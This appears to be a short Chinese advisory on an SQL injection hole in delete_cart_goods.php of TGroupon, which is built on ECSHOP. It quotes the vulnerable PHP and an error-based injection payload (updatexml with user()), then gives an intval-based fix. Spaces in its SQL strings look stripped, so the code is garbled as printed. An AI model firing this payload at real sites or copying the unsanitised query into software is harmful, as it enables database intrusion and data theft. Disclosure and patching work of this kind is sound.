TGroupon其实就是ECSHOP修改的。


漏洞文件:

delete_cart_goods.php

if($_POST['id']){$sql='DELETEFROM'.$GLOBALS['ecs']->table('cart')."WHERErec_id=".$_POST['id'];$GLOBALS['db']->query($sql);}


漏洞测试:

http://www.baidu.com/delete_cart_goods.php

POST:

id=1%20or%20updatexml(1,concat(0x7e,user(),0x7e),0)


修复:第一个 IF代码语句

if($_POST['id']){$sql='DELETEFROM'.$GLOBALS['ecs']->table('cart')."WHERErec_id=".$_POST['id'];$GLOBALS['db']->query($sql);}

换成如下代码:

if($_POST['id']){$id=intval($_POST['id']);//增加转换类型By:i2ty,这样可以防止传入其他的东西进来if($id==0){exit;//当错误时退出。}else{$sql='DELETEFROM'.$GLOBALS['ecs']->table('cart')."WHERErec_id=".$id;$GLOBALS['db']->query($sql);}}

附件:http://down.51cto.com/data/2367818